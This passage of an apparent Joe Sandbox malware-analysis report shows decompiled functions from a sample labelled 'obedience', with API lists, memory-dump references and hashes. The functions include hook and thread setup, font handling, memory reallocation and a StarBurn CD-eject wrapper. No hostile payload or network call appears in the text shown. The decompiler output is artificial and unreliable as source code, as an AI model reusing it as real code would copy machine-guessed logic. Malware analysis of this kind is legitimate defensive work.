						 *0x490b98 = _t2;
					}
				}
				return _t2;
			}





      0x00462e2d
      0x00462e39
      0x00462e42
      0x00462e54
      0x00462e59
      0x00462e59
      0x00462e65
      0x00462e6f
      0x00462e74
      0x00462e74
      0x00462e80
      0x00462e93
      0x00462e98
      0x00462e98
      0x00462e80
      0x00462e9e

      APIs
      • GetCurrentThreadId.KERNEL32 ref: 00462E44
      • SetWindowsHookExA.USER32 ref: 00462E54
      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00465961,?,?,02481268,00000000,?,004652E4,?), ref: 00462E6F
      • CreateThread.KERNEL32 ref: 00462E93
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CreateThread$CurrentEventHookWindows
      • String ID:
      • API String ID: 1195359707-0
      • Opcode ID: 81247c173709a16cd11bedd831dfea622b68d133b2701008e0eca43815109d55
      • Instruction ID: 633b8df58b9ed23893774f6be9a26f0b9510b9416ecbb4af2a38aae6d3ff9e2a
      • Opcode Fuzzy Hash: 81247c173709a16cd11bedd831dfea622b68d133b2701008e0eca43815109d55
      • Instruction Fuzzy Hash: 6CF0FE74A84711BEF7606BA4ED07F1736949730B1EF10053BF118791D2D7F92884865E
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042C654 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
      Download Yara Rule
      C-Code - Quality: 68%
      			E0042C654(struct HDC__* __eax) {
				intOrPtr _v32;
				void* _t4;
				intOrPtr _t7;
				struct HDC__* _t8;
				struct tagTEXTMETRICA* _t9;

				_t7 = 1;
				_push(0);
				L00407658();
				_t8 = __eax;
				if(__eax != 0) {
					_t4 =  *0x4908a4; // 0x58a00b4
					if(SelectObject(__eax, _t4) != 0 && GetTextMetricsA(_t8, _t9) != 0) {
						_t7 = _v32;
					}
					_push(_t8);
					_push(0);
					L004078C0();
				}
				return _t7;
			}








      0x0042c659
      0x0042c65b
      0x0042c65d
      0x0042c662
      0x0042c666
      0x0042c668
      0x0042c676
      0x0042c683
      0x0042c683
      0x0042c687
      0x0042c688
      0x0042c68a
      0x0042c68a
      0x0042c696

      APIs
      • 73BEAC50.USER32(00000000), ref: 0042C65D
      • SelectObject.GDI32(00000000,058A00B4), ref: 0042C66F
      • GetTextMetricsA.GDI32(00000000), ref: 0042C67A
      • 73BEB380.USER32(00000000,00000000,00000000,058A00B4,00000000), ref: 0042C68A
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B380MetricsObjectSelectText
      • String ID:
      • API String ID: 3841012960-0
      • Opcode ID: ccbd5ef70bd8c45dfd4dee1ebf37b600c2f99c8b9c47af743296eea331a48729
      • Instruction ID: 1330267a3721a75eba3b3f094e9377b0bc5d2bf342b09ef4b79a6e6bbefe7c67
      • Opcode Fuzzy Hash: ccbd5ef70bd8c45dfd4dee1ebf37b600c2f99c8b9c47af743296eea331a48729
      • Instruction Fuzzy Hash: CEE04811B475712AD51131751C82BAF264C4F127A5F491636FD44AA6C1D51EDD0483FF
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00407A4C Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00407A4C(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





      0x00407a4f
      0x00407a56
      0x00407a5b
      0x00407a61
      0x00407a66

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Global$AllocHandleWire
      • String ID:
      • API String ID: 2210401237-0
      • Opcode ID: 06cb8f056fea398f8c2afd8d71e10811086597bdb6ea6dde3b237863fa053c4a
      • Instruction ID: 7b2c75872dfc9c524567df3e3f0fb096a1644f641fac76eba40984c8169f81d5
      • Opcode Fuzzy Hash: 06cb8f056fea398f8c2afd8d71e10811086597bdb6ea6dde3b237863fa053c4a
      • Instruction Fuzzy Hash: 5FB009F4C9830439EA0533B64C8FD3B102C989874938049AE3440BA3C2987DBC40803F
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00425B40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
      Download Yara Rule
      C-Code - Quality: 79%
      			E00425B40(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x425cc9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(0x425cd0);
					return E00404A64( &_v80, 3);
				} else {
					_t76 =  *0x4908dc; // 0x2480a30
					E00424E60(_t76);
					_push(_t137);
					_push(0x425ca1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E00404CA4( &_v72, _v8 + 0x1b);
						if(E00408EAC(_v72, "Default") != 0) {
							E00404CA4( &_v80, _v8 + 0x1b);
							E00409ADC( &(_v68.lfFaceName), _v80);
						} else {
							E00404CA4( &_v76, "\rMS Sans Serif");
							E00409ADC( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E00425E24(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x425ca8);
					_t81 =  *0x4908dc; // 0x2480a30
					return E00424E6C(_t81);
				}
			}
















      0x00425b41
      0x00425b43
      0x00425b49
      0x00425b4c
      0x00425b4f
      0x00425b52
      0x00425b56
      0x00425b57
      0x00425b5c
      0x00425b5f
      0x00425b65
      0x00425b6f
      0x00425cb3
      0x00425cb6
      0x00425cc8
      0x00425b75
      0x00425b75
      0x00425b7a
      0x00425b81
      0x00425b82
      0x00425b87
      0x00425b8a
      0x00425b94
      0x00425ba0
      0x00425ba5
      0x00425baa
      0x00425baf
      0x00425bb9
      0x00425bc4
      0x00425bbb
      0x00425bbb
      0x00425bbb
      0x00425bd5
      0x00425be2
      0x00425bef
      0x00425bf8
      0x00425c04
      0x00425c18
      0x00425c3d
      0x00425c48
      0x00425c1a
      0x00425c22
      0x00425c2d
      0x00425c2d
      0x00425c4d
      0x00425c51
      0x00425c55
      0x00425c60
      0x00425c62
      0x00425c6a
      0x00425c64
      0x00425c66
      0x00425c70
      0x00425c68
      0x00425c76
      0x00425c76
      0x00425c66
      0x00425c86
      0x00425c86
      0x00425c8b
      0x00425c8e
      0x00425c91
      0x00425c96
      0x00425ca0
      0x00425ca0

      APIs
        • Part of subcall function 00424E60: RtlEnterCriticalSection.KERNEL32(?,00424E9D), ref: 00424E64
      • CreateFontIndirectA.GDI32(?), ref: 00425C7E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CreateCriticalEnterFontIndirectSection
      • String ID: MS Sans Serif$Default
      • API String ID: 2931345757-2137701257
      • Opcode ID: 932ff50f0bb9c49dc5642c760928c94e8775376fe361992fd486c25b49345ba6
      • Instruction ID: 819dd83016e267e1a5c97b67b4ce15c7fda616d82968a268d7875e40e96a78e7
      • Opcode Fuzzy Hash: 932ff50f0bb9c49dc5642c760928c94e8775376fe361992fd486c25b49345ba6
      • Instruction Fuzzy Hash: 0C514C70B04788DFDB01DFA5D585B8DBBF5AF49304FA580AAD800A7352E3789E05CB59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040D000 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
      Download Yara Rule
      C-Code - Quality: 87%
      			E0040D000(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				struct _MEMORY_BASIC_INFORMATION _v40;
				char _v301;
				char _v308;
				intOrPtr _v312;
				char _v316;
				char _v320;
				char _v324;
				intOrPtr _v328;
				char _v332;
				void* _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				intOrPtr _v356;
				char _v360;
				char _v364;
				char _v368;
				void* _v372;
				char _v376;
				intOrPtr _t55;
				intOrPtr _t65;
				intOrPtr _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t107;
				void* _t114;
				void* _t115;
				void* _t118;

				_t115 = __esi;
				_t114 = __edi;
				_t98 = __ecx;
				_v376 = 0;
				_v340 = 0;
				_v348 = 0;
				_v344 = 0;
				_v8 = 0;
				_push(_t118);
				_push(0x40d1c3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t118 + 0xfffffe8c;
				_t95 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t95 + 0x14)) != 0) {
					_t55 =  *0x48f850; // 0x407de4
					E00406A3C(_t55, __ecx,  &_v8);
				} else {
					_t92 =  *0x48f9e4; // 0x407ddc
					E00406A3C(_t92, __ecx,  &_v8);
				}
				_v12 =  *((intOrPtr*)(_t95 + 0x18));
				VirtualQuery( *(_t95 + 0xc),  &_v40, 0x1c);
				if(_v40.State != 0x1000 || GetModuleFileNameA(_v40.AllocationBase,  &_v301, 0x105) == 0) {
					_v372 =  *(_t95 + 0xc);
					_v368 = 5;
					_v364 = _v8;
					_v360 = 0xb;
					_v356 = _v12;
					_v352 = 5;
					_t65 =  *0x48f860; // 0x407d8c
					E00406A3C(_t65, _t98,  &_v376);
					E0040CC28(_t95, _v376, 1, _t114, _t115, 2,  &_v372);
				} else {
					_v336 =  *(_t95 + 0xc);
					_v332 = 5;
					E00404CB0( &_v344, 0x105,  &_v301);
					E00409908(_v344, 0x105,  &_v340);
					_v328 = _v340;
					_v324 = 0xb;
					_v320 = _v8;
					_v316 = 0xb;
					_v312 = _v12;
					_v308 = 5;
					_t88 =  *0x48f8d4; // 0x407e8c
					E00406A3C(_t88, 0x105,  &_v348);
					E0040CC28(_t95, _v348, 1, _t114, _t115, 3,  &_v336);
				}
				_pop(_t107);
				 *[fs:eax] = _t107;
				_push(E0040D1CA);
				E00404A40( &_v376);
				E00404A64( &_v348, 3);
				return E00404A40( &_v8);
			}


































      0x0040d000
      0x0040d000
      0x0040d000
      0x0040d00c
      0x0040d012
      0x0040d018
      0x0040d01e
      0x0040d024
      0x0040d029
      0x0040d02a
      0x0040d02f
      0x0040d032
      0x0040d038
      0x0040d03f
      0x0040d053
      0x0040d058
      0x0040d041
      0x0040d044
      0x0040d049
      0x0040d049
      0x0040d060
      0x0040d06d
      0x0040d079
      0x0040d138
      0x0040d13e
      0x0040d148
      0x0040d14e
      0x0040d158
      0x0040d15e
      0x0040d174
      0x0040d179
      0x0040d18b
      0x0040d09c
      0x0040d09f
      0x0040d0a5
      0x0040d0bd
      0x0040d0ce
      0x0040d0d9
      0x0040d0df
      0x0040d0e9
      0x0040d0ef
      0x0040d0f9
      0x0040d0ff
      0x0040d115
      0x0040d11a
      0x0040d12c
      0x0040d131
      0x0040d194
      0x0040d197
      0x0040d19a
      0x0040d1a5
      0x0040d1b5
      0x0040d1c2

      APIs
      • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040D1C3), ref: 0040D06D
      • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040D1C3), ref: 0040D08F
        • Part of subcall function 00406A3C: LoadStringA.USER32 ref: 00406A6E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileLoadModuleNameQueryStringVirtual
      • String ID: }@
      • API String ID: 902310565-142398135
      • Opcode ID: 38891e223d590285da77923b28cd5655d6eead6a4f9a78662bf517dc28cb9e7b
      • Instruction ID: 8ab2fe247369d51e40cffcec1e791ba1a36e1af89c2d2c0800f3205da171578f
      • Opcode Fuzzy Hash: 38891e223d590285da77923b28cd5655d6eead6a4f9a78662bf517dc28cb9e7b
      • Instruction Fuzzy Hash: 2351E370A04658DFDB60DB68CD85BCAB7F4AB49304F4045EAE508BB381D774AE88CF55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00482214 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
      Download Yara Rule
      C-Code - Quality: 64%
      			E00482214(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _t52;
				char _t58;
				intOrPtr _t93;
				char _t100;
				intOrPtr _t115;
				intOrPtr* _t121;
				intOrPtr _t123;
				void* _t126;

				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = 0;
				_t121 = __eax;
				_push(_t126);
				_push(0x482361);
				_push( *[fs:eax]);
				 *[fs:eax] = _t126 + 0xffffffe0;
				E00481DC4( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x10)) + 0x18)), __ebx, __eax, __esi, __fp0);
				_t52 =  *0x490c50; // 0x0
				E0047FD7C(_t52, __ebx, 0, "CdvdBurnerGrabber_Eject", _t121, __esi, __fp0);
				_t123 =  *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18));
				_push(_t123 + 0x4e8);
				_push(_t123 + 0xe4);
				_push(0x400);
				_push(_t123 + 0xe8);
				_t58 =  *((intOrPtr*)(_t123 + 0xd8));
				_push(_t58);
				L00465E84();
				_t100 = _t58;
				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18)) + 0xe0)) = _t100;
				if(_t100 == 0) {
					E00409668(0x3b35,  &_v36);
					E00404A94( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18)) + 4, _v36);
					 *((intOrPtr*)( *_t121 + 0x14))();
				} else {
					_v32 = 0;
					_v28 = 0;
					_v24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18)) + 0xe4));
					_v20 = 0;
					_v16 =  *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18)) + 0xe8;
					_v12 = 6;
					E0040A164("StarBurn_CdvdBurnerGrabber_Eject() failed, exception %d, status %d, text \"%s\"", 2,  &_v32,  &_v8);
					E00404A94( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18)) + 4, _v8);
					_t93 =  *0x490c50; // 0x0
					E0047FD7C(_t93, _t100, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) + 0x18)) + 4)), _t121, _t123, __fp0);
					 *((intOrPtr*)( *_t121 + 0x14))();
				}
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x482368);
				E00404A40( &_v36);
				return E00404A40( &_v8);
			}



















      0x0048221a
      0x0048221b
      0x0048221f
      0x00482222
      0x00482225
      0x00482229
      0x0048222a
      0x0048222f
      0x00482232
      0x0048223b
      0x00482247
      0x0048224c
      0x00482254
      0x0048225d
      0x00482264
      0x00482265
      0x00482270
      0x00482271
      0x00482277
      0x00482278
      0x0048227d
      0x00482285
      0x0048228d
      0x0048231b
      0x0048232c
      0x00482340
      0x00482293
      0x0048229b
      0x0048229e
      0x004822ae
      0x004822b1
      0x004822c0
      0x004822c3
      0x004822d4
      0x004822e5
      0x004822f5
      0x004822fa
      0x0048230e
      0x0048230e
      0x00482345
      0x00482348
      0x0048234b
      0x00482353
      0x00482360

      APIs
        • Part of subcall function 00481DC4: StarBurn_CdvdBurnerGrabber_Release.STARBURN(00000000,0048172F,00000400,00000000,?,00000000,00481EB6), ref: 00481E23
      • StarBurn_CdvdBurnerGrabber_Eject.STARBURN(?,?,00000400,?,?,00000000,00482361), ref: 00482278
      Strings
      • StarBurn_CdvdBurnerGrabber_Eject() failed, exception %d, status %d, text "%s", xrefs: 004822CF
      • CdvdBurnerGrabber_Eject, xrefs: 00482242
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_BurnerCdvdGrabber_Star$EjectRelease
      • String ID: CdvdBurnerGrabber_Eject$StarBurn_CdvdBurnerGrabber_Eject() failed, exception %d, status %d, text "%s"
      • API String ID: 2971828438-1604757720
      • Opcode ID: 794b6099cb0b181bc9408f236dbb428ea4c321841b4a9951a60fa6dcec228043
      • Instruction ID: 05de91d9fc0a0eac51ca9a4d766eca4f8282f15ed9dd885b846f1a446a54e838
      • Opcode Fuzzy Hash: 794b6099cb0b181bc9408f236dbb428ea4c321841b4a9951a60fa6dcec228043
      • Instruction Fuzzy Hash: 9F4119746006459FCB04DF69C881E8AB7F8FF59304F118966E905EB362D778ED44CBA8
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042F268 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
      Download Yara Rule
      C-Code - Quality: 73%
      			E0042F268(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t27;
				intOrPtr* _t40;
				intOrPtr _t55;
				struct HDC__* _t61;
				char _t65;
				intOrPtr _t71;
				void* _t73;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t87;
				void* _t90;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = 0;
				_t65 = __edx;
				_t84 = __eax;
				_push(_t87);
				_push(0x42f386);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xfffffff8;
				_t27 =  *((intOrPtr*)(__eax + 0x1f));
				if(__edx == _t27) {
					L21:
					_pop(_t71);
					 *[fs:eax] = _t71;
					_push(0x42f38d);
					return E00404A40( &_v12);
				}
				_t82 = 0;
				_t73 = __edx - 1;
				_t90 = _t73;
				if(_t90 < 0) {
					E0042F394(__eax, 0);
					_t33 =  *((intOrPtr*)(_t84 + 4));
					if( *((intOrPtr*)(_t84 + 4)) != 0) {
						E00426B80(_t33, 0);
					}
					DeleteDC( *(_t84 + 0x20));
					 *(_t84 + 0x20) = 0;
					L15:
					if(_t82 != 0) {
						_t40 = E0042F804(_t84, _t65, _t82, _t84);
						_t69 =  *_t40;
						_v8 =  *((intOrPtr*)( *_t40 + 0x18))(E0042F7EC(_t84));
						 *(_t84 + 0x20) =  *_t82(E00404F00( *((intOrPtr*)(_v8 + 4))), E00404F00( *((intOrPtr*)(_v8 + 8))), E00404F00( *((intOrPtr*)(_v8 + 0xc))),  *((intOrPtr*)(_t84 + 0x24)));
						if( *(_t84 + 0x20) == 0) {
							_t55 =  *0x48f8d8; // 0x423b50
							E00406A3C(_t55, _t69,  &_v12);
							E0042EE58(_v12);
						}
						_t53 =  *((intOrPtr*)(_t84 + 4));
						if( *((intOrPtr*)(_t84 + 4)) != 0) {
							E00426B80(_t53,  *(_t84 + 0x20));
						}
					}
					 *((char*)(_t84 + 0x1f)) = _t65;
					goto L21;
				}
				if(_t90 == 0) {
					if(_t27 == 2) {
						goto L21;
					}
					_t82 = 0x4072b0;
				} else {
					if(_t73 == 1) {
						_t60 =  *((intOrPtr*)(__eax + 4));
						if( *((intOrPtr*)(__eax + 4)) != 0) {
							E00426B80(_t60, 0);
						}
						_t61 =  *(_t84 + 0x20);
						if(_t61 != 0) {
							DeleteDC(_t61);
						}
						_t82 = 0x407288;
					}
				}
			}
















      0x0042f26e
      0x0042f26f
      0x0042f270
      0x0042f273
      0x0042f276
      0x0042f278
      0x0042f27c
      0x0042f27d
      0x0042f282
      0x0042f285
      0x0042f288
      0x0042f28d
      0x0042f370
      0x0042f372
      0x0042f375
      0x0042f378
      0x0042f385
      0x0042f385
      0x0042f293
      0x0042f297
      0x0042f297
      0x0042f29a
      0x0042f2a8
      0x0042f2ad
      0x0042f2b2
      0x0042f2b6
      0x0042f2b6
      0x0042f2bf
      0x0042f2c6
      0x0042f2fa
      0x0042f2fc
      0x0042f308
      0x0042f30e
      0x0042f313
      0x0042f340
      0x0042f347
      0x0042f34c
      0x0042f351
      0x0042f359
      0x0042f359
      0x0042f35e
      0x0042f363
      0x0042f368
      0x0042f368
      0x0042f363
      0x0042f36d
      0x00000000
      0x0042f36d
      0x0042f29c
      0x0042f2cd
      0x00000000
      0x00000000
      0x0042f2d3
      0x0042f29e
      0x0042f2a0
      0x0042f2da
      0x0042f2df
      0x0042f2e3
      0x0042f2e3
      0x0042f2e8
      0x0042f2ed
      0x0042f2f0
      0x0042f2f0
      0x0042f2f5
      0x0042f2f5
      0x0042f2a0

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
